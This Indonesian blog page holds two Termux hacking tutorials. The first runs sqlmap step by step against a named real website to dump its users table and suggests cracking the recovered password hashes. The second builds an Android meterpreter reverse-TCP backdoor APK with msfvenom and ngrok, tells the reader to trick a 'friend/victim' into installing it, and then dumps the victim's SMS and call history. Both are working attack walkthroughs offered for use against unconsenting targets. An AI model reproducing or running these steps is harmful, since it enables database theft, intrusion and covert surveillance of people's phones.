Tutorial mencari user name & password Sqlmap Injection via termux

Selamat Datang Kembali Di Blog Kami Classybsd

Tutorial mencari isi dari database sebuah web dengan sql ijection

kali ini kami ingin membagikan sedikit pengetahuan tentang mencari isi sebuah database web dengan menggunakan sql ijection semoga bisa membantu,dan bermanfaat.langsung saja kita ke tutorial nya

Bahan-bahan:

1. kopi dan cemilan supaya agan bisa berkreasi dan jangan lupa minum air putih bisi keselek wkwk
2. apk termux nya bisa download di playstore,kalau gak ada apk termuxnya gimana mau jalanin sql ijection nya wkwk
3. ko-dork ( untuk mencari dork )
4. sql ijection ( untuk mengijection sebuah web )
5. lebih baik di temani doi biar ada motivasi,boleh sama doi orang lain juga kalau dia nya mau wkwk

hehe sorry gan bercanda mulu wkwk,langsung saja kita ke tutorial nya,pertama-tama buka apk termux nya dan install dulu ko-dork ( untuk mencari dork ) dengan ketik

• $ apt update
• $ apt upgrade
• $ apt install python2
• $ apt install git
• $ git clone https://github.com/CiKu370/ko-dork
• $ cd ko-dork
• $ chmod +× dork.py
• $ ls
• dan untuk menjalakan nya ketik $ python2 dork.py

dan akan muncul gambar seperti dibawah ini

Penjelasan:

• inurl ( dork ) bisa di google
• site ( situs ) bisa pake com,uk,id,dll. bebas terserah agan mau pake yang mana
• max page ,bebas mau berapa jumlah nya juga

contoh penggunaan ko-dork bisa dilihat gambar dibawah ini dan akan muncul website ( vuln )

sampai disini kita sudah menginstall dan menjalankan ko-dork/mencari ( web vuln )

mungkin sampai disini sudah paham cara menjalankan ko-dork.

untuk membuka list yang sudah di tersimpan di ko-dork ketik cat vuln.txt

bisa lihat gambar dibawah ini

dan sekarang kita lanjut install sqlmap injection,lalu new session ( usap layar agan dari kiri ke kanan ) dengan ketik

• $ apt update
• $ apt upgrade
• $ apt install python2
• $ apt install git
• $ git clone https://github.com/sqlmapproject/sqlmap.git
• $ cd sqlmap
• $ chmod +× sqlmap.py
• $ ls
• dan untuk menjalakannya ketik $ python2 sqlmap.py
• $ python2 sqlmap.py --help( untuk melihat perintah sqlmap )

dan akan muncul gambar seperti dibawah ini

disini kita sudah menginstall sqlmap nya

langsung saja lanjut ke tahap selanjutnya yaitu mengijection sebuah web ( vuln )

contoh dengan ketik

• $ python2 sqlmap.py -u http://www.meggieschneider.com/php/detail.php?id=48 --dbs ( lalu tekan enter )

maka akan muncul DATABASE seperti gambar dibawah ini

selanjutnya ketik

• $ python2 sqlmap.py -u http://www.meggieschneider.com/php/detail.php?id=48 -D DB383432 --tables ( lalu tekan enter )

maka akan muncul DATABASE,dan TABLE gambar seperti dibawah ini

selanjutnya ketik

• $ python2 sqlmap.py -u http://www.meggieschneider.com/php/detail.php?id=48 -D DB383432 -T users --columns ( lalu tekan enter )

maka akan muncul DATABASE,TABLE,dan COLUMNS seperti dibawah ini

dan yang terakhir ketik

• $ python2 sqlmap.py -u http://www.meggieschneider.com/php/detail.php?id=48 -D DB383432 -T users -C ID --dump ( yang ID bisa diganti dengan pass )

maka akan muncul DATABASE,TABLE,COLUMNS,dan hasil dumper seperti gambar dibawah ini

penjelasan:

• -u ( user )
• --dbs ( database )
• -D ( Data )
• -T ( tabel )
• -C ( columns )
• -dump ( dumper )

Password masih berbentuk angka dan huruf maka kreasikan diri agan untuk mengcrack password nya bisa dengan Hashkiller dll
Sekian tutorial dari kami tentang sqlmap injection semoga bisa bermanfaat,dan ingat jangan disalah gunakan,kejahatan Cyber tidak akan terlihat,tapi akan meninggalkan jejak, bila ada yang kurang dimengerti,bisa komen dikolom komentar
Untuk kritik dan saran bisa langsung ke kolom komentar juga
Mohon maaf kalo ada salah dalam penulisan,dll

Terima Kasih

Nanti kan tutorial selanjutnya dari kami,terima kasih telah mengunjungi blog kami

Goodluck

Tutorial sadap hp tanpa menyentuh hp korban via termux

Selamat datang di blog baru classybsd yang masih belajar hehehe 😅

Pertama-tama perkenalkan kami sekelompok anak muda yang menggemari dunia teknologi dan game khususnya hp android dan semoga bisa membantu/bermanfaat untuk agan yang membaca nya hhehe

Kali ini kami ingin men-share sedikit pengetahuan tentang sadap hp via termux
Kita langsung saja ke tutorialnya

Bahan-bahan:

1. Cemilan biar nanti ga panik wkwkwkw
2. Kesabaran wkwk
3. Hp O.S nya 5.0 atau keatas
4. Termux bisa didownload di playstore
5. Metasploit
6. Ngrok
7. Backdoor

Langsung aja ke tutorial menjalankan termuxnya,Pertama buka termux untuk install metasploitnya dulu ketik

• $ apt update && apt upgrade
• $ apt  install unstable-repo
• $ apt install metasploit ( tunggu saja sampe installasinya selesai ) disini peran cemilan penting dan kopi karena installasinya agak lama hehehe Kalau metasploit sudah terinstall ketik msfconsole maka akan muncul gambar seperti dibawah

Nah sudah terinstall kita sekarang install ngrok nya Bagi yang belum daftar ke ngrok tinggal buka dibrowser klik link ini ngrok.com

Mungkin udah pada bisa daftar ngrok nya hehe Setelah sudah daftar ngrok nya kita klik Auth seperti gambar dibawah ini



Dan copy kode Auth seperti gambar dibawah ini



Sekarang kembali lagi ke termux dengan new session ( usap layar dari kiri ke kanan ) Langsung saja kita ke cara install ngrok nya dengan ketik

• $ apt update && apt upgrade -y
• $ apt install wget
• $ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip -O ngrok.zipEkstrak file ngrok.zip
• $ unzip ngrok-stable-linux-arm.zip
• Disini masukan kode Auth nya agan yg sudah di copy tadi ( contoh $ ./ngrok authtoken blablabla
• $ ./ngrok http 80

Dan akan muncul gambar seperti dibawah ini



Agan ga usah panik disini karena ngrok nya reconnecting, Dan cara untuk online ngrok nya cukup mudah hanya nyalakan hotspot hp agan tarraa bisa dilihat gambar dibawah ini ngrok nya online



Bila masih reconnecting agan bisa ketik ditermux ctrl-c lalu masukan lagi $ ./ngrok http 80

Nah sekarang kita ketahap pembuatan backdoor nya buka lagi new session ( usap layar kiri ke kanan ) lalu ketik

• $ termux-setup-storage
• $ msfvenom -p android/meterpreter/reverse_tcp LHOST=( masukan ip addres anda ) LPORT=4444
( LPORT bebas asalkan 4 angka ) -o /sdcard/backdoor.apk

Contoh

• $ msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1  LPORT=4444 -o /sdcard/jomblis.apk

( untuk nama apk nya terserah agan mau dinamain apa juga yang penting menarik ) wkwkw Kalau sudah seperti gambar dibawah ini berati jomblis.apk nya sudah berhasil dibuat dan untuk memastikan nya tinggal cek di file manager

Setelah selesai membuat backdoor/jomblis.apk lalu kirimkan ke teman/korban boleh lewat whatsapps dll,kreatifitaskan agan supaya teman/korban bisa menginstall backdoor/jomblis.apk tersebut Setelah teman/korban menginstall backdoor/jomblis.apk  kembali lagi ke termux lalu jalankan metasploit dengan mengetik

• msf5>use exploit/multi/handler
• msf5>set payload android/meterpreter/reverse_tcp
• msf5>set lhost 127.0.0.1 ( ip addres agan )
• msf5>set lport 4444        ( lport harus sesuai dengan lport backdoor )
• msf5>exploit atau run

Setelah muncul gambar seperti diatas ini tunggu saja sampai keluar tulisan meterpreter> lalu ketik

• dump_sms fungsi nya untuk melihat riwayat sms dari hp korban
• dump_callog fungsi nya untuk melihat histori panggilan

Lalu akan muncul sms_dump_blabla.txt dan salin sms_dump tersebut Buka new session lagi ( usap layar hp kiri ke kanan ) ketik

• <$ pkg install nano
• $ nano ( masukan sms_dump yang tadi sudah di salin )

contoh seperti gambar dibawah ini

Nah kalo sudah akan muncul gambar seperti dibawah ini berarti sadap hp berhasil

Untuk sadap selain dari dump_sms dan dump_callog  bisa juga sadap yang lain nya dengan cara masuk ke metasploit nya kembali lalu ketik

• meterpreter>help
fungsinya untuk melihat semua perintah

Kreatifitas kan diri anda disini

 selamat mencoba good luck

Sekian tutorial dari blog pertama kami :) Kalo blog nya masih ada ke kurangan mohon maaf karena kami masih newbie heheheh harap dimaklum heheheh Untuk kritik dan saran silahkan beri komentar agar kami bisa mengembangkan blog ini


Terima kasih telah mengunjungi blog kami :)